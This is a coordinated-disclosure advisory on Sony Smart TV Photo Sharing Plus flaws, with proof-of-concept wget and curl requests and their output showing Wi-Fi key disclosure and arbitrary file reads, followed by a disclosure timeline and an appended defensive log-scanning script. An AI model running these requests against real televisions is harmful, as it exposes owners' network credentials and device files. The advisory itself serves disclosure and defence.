UNCLASSIFIED

## ADVISORY INFORMATION

TITLE: Multiple vulnerabilities in Sony Smart TVs
ADVISORY URL: https://www.darkmatter.ae/blogs/security-flaws-uncovered-in-sony-smart-tvs/
DATE PUBLISHED: 23/04/2019
AFFECTED VENDORS: Sony
RELEASE MODE: Coordinated release
CVE: CVE-2019-10886, CVE-2019-11336
CVSSv3 for CVE-2019-10886: 6.5 (AV:A/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N)
CVSSv3 for CVE-2019-11336: 6.5 (AV:N/AC:L/PR:N/UI:N/S:U/C:L/I:N/A:N)

## PRODUCT DESCRIPTION

Sony Smart TVs ship with applications that add functionality for customers, including the "Photo Sharing Plus" application. The "Photo Sharing Plus" application running inside the Smart TV contains several weaknesses.

This application allows pictures to be uploaded from a smartphone to the TV in order to display them on a large screen. When started, Photo Sharing Plus turns the TV into a Wi-Fi access point and shows a Wi-Fi password that allows customers to connect and share their media content on the TV.

## DETAILS OF VULNERABILITIES

xen1thLabs found multiple vulnerabilities in Sony products in October 2018 and coordinated the disclosure of these vulnerabilities with Sony.

Two vulnerabilities were found in Sony Smart TVs by xen1thLabs while auditing the security of Smart TVs. The first vulnerability allows an unauthenticated attacker on the LAN/Wi-Fi to retrieve the static Wi-Fi password created by the television when the Photo Sharing Plus application is started. The second vulnerability allows an attacker to read arbitrary files located on the TV without authentication, including valuable files.

The summary of the vulnerabilities is:

- CVE-2019-10886 Sony Smart TV Photo Sharing Plus Arbitrary File Read Vulnerability
- CVE-2019-11336 Sony Smart TV Photo Sharing Plus Information Disclosure Vulnerability

The number of affected Sony models is very high and Sony has decided to remove this vulnerable application from all models (https://www.sony.com/electronics/support/televisions-projectors/articles/00204331).

Sony provided a non-exhaustive list of affected TV models from 2015-2016. Recent models also are affected:

- KDL-50W800C
- KDL-50W805C
- KDL-50W807C
- KDL-50W809C
- KDL-50W820C
- KDL-55W800C
- KDL-55W805C
- KDL-65W850C
- KDL-65W855C
- KDL-65W857C
- KDL-75W850C
- KDL-75W855C
- XBR-43X830C
- XBR-49X800C
- XBR-49X830C
- XBR-49X835C
- XBR-49X837C
- XBR-49X839C
- XBR-55X805C
- XBR-55X807C
- XBR-55X809C
- XBR-55X810C
- XBR-55X850C
- XBR-55X855C
- XBR-55X857C
- XBR-65X800C
- XBR-65X805C
- XBR-65X807C
- XBR-65X809C
- XBR-65X810C
- XBR-65X850C
- XBR-65X855C
- XBR-65X857C
- XBR-75X850C
- XBR-75X855C
- XBR-55X900C
- XBR-55X905C
- XBR-55X907C
- XBR-65X900C
- XBR-65X905C
- XBR-65X907C
- XBR-65X930C
- XBR-75X910C
- XBR-75X940C
- XBR-75X945C
- XBR-43X800D
- XBR-49X800D
- XBR-49X835D
- XBR-55X850D
- XBR-55X855D
- XBR-55X857D
- XBR-65X850D
- XBR-65X855D
- XBR-65X857D
- XBR-75X850D
- XBR-75X855D
- XBR-75X857D
- XBR-85X850D
- XBR-85X855D
- XBR-85X857D
- XBR-55X930D
- XBR-65X930D
- XBR-65X935D
- XBR-65X937D
- XBR-75X940D
- XBR-100Z9D
- XBR-49X700D
- XBR-55X700D
- XBR-65X750D
- XBR-65Z9D
- XBR-75Z9D
- XBR-43X800E
- XBR-49X800E
- XBR-49X900E
- XBR-55A1E
- XBR-55X800E
- XBR-55X806E
- XBR-55X900E
- XBR-55X930E
- XBR-65A1E
- XBR-65X850E
- XBR-65X900E
- XBR-65X930E
- XBR-75X850E
- XBR-75X900E
- XBR-75X940E
- XBR-77A1E

### 1. CVE-2019-11336 Sony Smart TV Photo Sharing Plus Information Disclosure Vulnerability

An unauthenticated remote attacker can retrieve the plaintext wireless password through the "Photo Sharing Plus" API.

After starting the application, the following example retrieves the wireless password created by the TV (IP address of the TV is 192.168.1.102) over the LAN, without authentication:

```
root@kali:~# wget -qO- --post-data='{"id":80,"method":"getContentShareServerInfo","params":[],"version":"1.0"}' http://[ip_tv]:10000/contentshare/
{"result":[{"ssid":"DIRECT-GD-BRAVIA","keyType":"","key":"8362tbwX","deviceName":"","url":"http:\/\/192.168.49.1","touchPadRemote":"notSupported"}],"id":80}
```

The password is 8362tbwX.

By reading the logs of the TV, we can confirm the password has been delivered over HTTP, without authentication. The logs contain the password in plaintext:

```
01-01 07:47:23.730 5539 18687 I System.out: [MEXI][D] HttpEndPoint: send: {"result":[{"ssid":"DIRECT-GD-BRAVIA","keyType":"","key":"8362tbwX","deviceName":"","url":"http:\/\/192.168.49.1","touchPadRemote":"notSupported"}],"id":80}
```

It is also important to note that the wireless password generated by the TV is always the same. Even after a hard reboot and a disconnection from the power supply, the generated password is unchanged. This lack of randomness is also a security issue.

### 2. CVE-2019-10886 Sony Smart TV Photo Sharing Plus Arbitrary File Read Vulnerability

It is possible to retrieve internal TV files over HTTP without authentication.

By default, images used by the Photo Sharing Plus application are stored inside `/data/user/0/com.sony.dtv.photosharingplus/files/_BRAVPSS.TMP/`.

The application starts an access point on the television, and an HTTP daemon listens on a TCP port on this WLAN.
Furthermore, this daemon also listens on the LAN side of the television, and it is possible to retrieve these images from the LAN using a URL such as:

http://[ip_tv]:10000/contentshare/image/data/user/0/com.sony.dtv.photosharingplus/files/_BRAVPSS.TMP/LJYT0010.JPG

Browsing the address http://[ip_tv]:10000/contentshare/image/ gives access to the root directory of the television running Android.

By exploiting this vulnerability, /default.prop (containing Android properties) can be retrieved via http://192.168.1.102:10000/contentshare/image/default.prop:

```
root@kali:~# curl -v http://192.168.1.102:10000/contentshare/image/default.prop
*   Trying 192.168.1.102...
* TCP_NODELAY set
* Connected to 192.168.1.102 (192.168.1.102) port 10000 (#0)
> GET /contentshare/image/default.prop HTTP/1.1
> Host: 192.168.1.102:10000
> User-Agent: curl/7.58.0
> Accept: */*
>
< HTTP/1.1 200 OK
< Connection: close
< Content-Length: 591
< Content-Type: application/octet-stream
<
#
# ADDITIONAL_DEFAULT_PROPERTIES
#
ro.secure=1
security.perf_harden=1
ro.allow.mock.location=0
ro.debuggable=0
ro.zygote=zygote32
dalvik.vm.image-dex2oat-Xms=64m
dalvik.vm.image-dex2oat-Xmx=64m
dalvik.vm.dex2oat-Xms=64m
dalvik.vm.dex2oat-Xmx=512m
ro.dalvik.vm.native.bridge=0
debug.atrace.tags.enableflags=0
#
# BOOTIMAGE_BUILD_PROPERTIES
#
ro.bootimage.build.date=2016? 11? 14? ??? 15:34:56 JST
ro.bootimage.build.date.utc=1479105296
ro.bootimage.build.fingerprint=Sony/BRAVIA_ATV2_PA/BRAVIA_ATV2:6.0.1/MMB29V.S50/1.6.0.06.14.0.00:user/release-keys
persist.sys.usb.config=none
* Closing connection 0
```

Logs in the TV confirm the /default.prop file has been delivered over HTTP:

```
01-01 07:46:00.891 5539 18775 I PhotoShareApp: [18775][e]Handle get Uri :/contentshare/image/default.prop
01-01 07:46:00.891 5539 18775 D PhotoShareApp: [18775][e]getLocalFilePath() start, uri=/contentshare/image/default.prop
01-01 07:46:00.891 5539 18775 D PhotoShareApp: [18775][e]loadType: /contentshare/image
01-01 07:46:00.891 5539 18775 D PhotoShareApp: [18775][e]localResPath: /default.prop
01-01 07:46:00.891 5539 18775 D PhotoShareApp: [18775][e]ext:.prop
01-01 07:46:00.891 5539 18775 I PhotoShareApp: [18775][e]Content Type :application/octet-stream
01-01 07:46:00.891 5539 18775 D PhotoShareApp: [18775][e]fileSize:591
01-01 07:46:00.892 5539 18775 D PhotoShareApp: [18775][e]Write to response ... 591
01-01 07:46:00.892 5539 18775 D PhotoShareApp: [18775][e]Write to response completed.
```

## DISCLOSURE TIMELINE

03/10/2018 - Vulnerabilities found
10/10/2018 - Report to Sony - Report to Sony Bug bounty program through HackerOne
12/10/2018 - Confirmation of the reception of the bug report
15/10/2018 - xen1thLabs explains that the vulnerabilities are also exploitable over HbbTV (DVB-{S,T,C}) - through HackerOne
29/10/2018 - Sony confirms the vulnerabilities
09/11/2018 - Sony confirms the patches will be available in March 2019 and asks xen1thLabs to wait until April 2019
29/11/2018 - xen1thLabs sent the slides prior to xen1thLabs's HiTB 2018 Dubai talk as agreed with Sony
14/01/2019 - Updates requested from xen1thLabs
15/01/2019 - Sony informs xen1thLabs that they are working on patches
27/01/2019 - Updates requested from xen1thLabs
07/03/2019 - Updates requested from xen1thLabs
15/03/2019 - Sony informs xen1thLabs that the agreed date for disclosure is not possible because they don't know when they will be ready "maybe in a couple of months"
17/03/2019 - Updates requested from Sony to understand and to publish a security advisory. xen1thLabs also requests CVEs officially
20/03/2019 - xen1thLabs asks for an acceptable timeline
21/03/2019 - xen1thLabs sent an email to Secure@xxxxxxxx due to the lack of proper communication from Sony and informing Sony that in order to protect their customers xen1thLabs needs to publish a security advisory
21/03/2019 - Automatic response from Secure@xxxxxxxx is no longer in use.
22/03/2019 - Sony is working on the patches and confirms the 12th April
26/03/2019 - xen1thLabs confirms the release date of the advisory and asks for CVEs
01/04/2019 - Sony confirms the vulnerabilities affect some models and "Sony plans to terminate Photo Sharing Plus service for all of models, and that completion date is scheduled for April 12th, 2019."
16/04/2019 - Sony only provides one CVE instead of two. Sony states "the wireless password recovery is within Sony's TV specification and is expected behavior and Sony will not be submitting for a CVE regarding this"
17/04/2019 - xen1thLabs requests a CVE from MITRE
23/04/2019 - Public disclosure

## SOLUTION

Apply patches provided by Sony

## CREDITS

xen1thLabs - Telecom Lab

## REFERENCES

https://www.darkmatter.ae/blogs/security-flaws-uncovered-in-sony-smart-tvs/

Firmware update to v6.5830 from 01-22-2019 (including security patches?)
https://www.sony.com/electronics/support/downloads/00015771

Firmware update to v6.5830 from 01-22-2019 (not including security patches)
https://www.sony.com/electronics/support/downloads/00015770

End of Photo Sharing Plus 11/22/2018
https://www.sony.com/electronics/support/articles/00204331

https://www.darkmatter.ae/xen1thlabs/sony-smart-tv-photo-sharing-plus-arbitrary-file-read-vulnerability-xl-19-002/

https://www.darkmatter.ae/xen1thlabs/sony-smart-tv-photo-sharing-plus-information-disclosure-vulnerability-xl-19-003/

## ABOUT xen1thLabs

xen1thLabs conducts vulnerability research, which feeds into the testing and validation activities it conducts across software, hardware and telecommunication. xen1thLabs houses a team of world-class experts dedicated to providing high impact capabilities in cyber security. At xen1thLabs we are committed to uncovering new vulnerabilities that combat tomorrow's threats today.

More information about xen1thLabs can be found at: https://www.darkmatter.ae/xen1thlabs/

## WORKING AT xen1thLabs

xen1thLabs is looking for several security researchers across multiple disciplines. Join a great team of likeminded specialists and enjoy all that UAE has to offer! If you are interested please visit: https://www.darkmatter.ae/xen1thlabs/
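
A log-side check for both issues in this advisory, as an added example that is not part of the original advisory or of Sony's code: it scans logcat-style lines in the format of the log excerpts above and flags files served from outside the application's image directory (CVE-2019-10886) and API responses that carry a Wi-Fi key (CVE-2019-11336). The sample lines, function names and finding labels are constructed for illustration.

```python
import json
import posixpath
import re

# Image store named in the advisory; anything served from elsewhere is suspect.
SHARE_DIR = "/data/user/0/com.sony.dtv.photosharingplus/files/_BRAVPSS.TMP"

# Constructed sample in the format of the advisory's log excerpts (not captured data).
SAMPLE_LOG = """\
01-01 07:46:00.891 5539 18775 D PhotoShareApp: [18775][e]localResPath: /default.prop
01-01 07:46:01.120 5539 18775 D PhotoShareApp: [18775][e]localResPath: /data/user/0/com.sony.dtv.photosharingplus/files/_BRAVPSS.TMP/LJYT0010.JPG
01-01 07:46:02.300 5539 18775 D PhotoShareApp: [18775][e]localResPath: /data/user/0/com.sony.dtv.photosharingplus/files/_BRAVPSS.TMP/../../cache/x.tmp
01-01 07:47:23.730 5539 18687 I System.out: [MEXI][D] HttpEndPoint: send: {"result":[{"ssid":"DIRECT-GD-BRAVIA","keyType":"","key":"8362tbwX"}],"id":80}
"""

# logcat "threadtime" layout: date time pid tid level tag: message
LINE_RE = re.compile(r"^(\d\d-\d\d \d\d:\d\d:\d\d\.\d+)\s+\d+\s+\d+\s+[A-Z]\s+([^:]+): (.*)$")

def is_confined(path):
    """True only if the normalised path stays inside SHARE_DIR."""
    return posixpath.normpath(path).startswith(SHARE_DIR + "/")

def ssids_with_key(message):
    """SSIDs of JSON result entries that carry a non-empty Wi-Fi key."""
    try:
        body = json.loads(message[message.index("{"):])
    except ValueError:  # no JSON payload, or malformed JSON
        return []
    results = body.get("result") if isinstance(body, dict) else None
    results = results if isinstance(results, list) else []
    return [r.get("ssid", "") for r in results if isinstance(r, dict) and r.get("key")]

def scan(log_text):
    """Return (timestamp, finding, detail) tuples; the key itself is never copied."""
    findings = []
    for line in log_text.splitlines():
        if not (m := LINE_RE.match(line)):
            continue
        ts, tag, msg = m.groups()
        if tag == "PhotoShareApp" and "localResPath:" in msg:
            path = msg.split("localResPath:", 1)[1].strip()
            if not is_confined(path):
                findings.append((ts, "file-read-outside-share-dir", posixpath.normpath(path)))
        elif "HttpEndPoint: send:" in msg:
            findings += [(ts, "wifi-key-in-response", s) for s in ssids_with_key(msg)]
    return findings

if __name__ == "__main__":
    print(*scan(SAMPLE_LOG), sep="\n")
```
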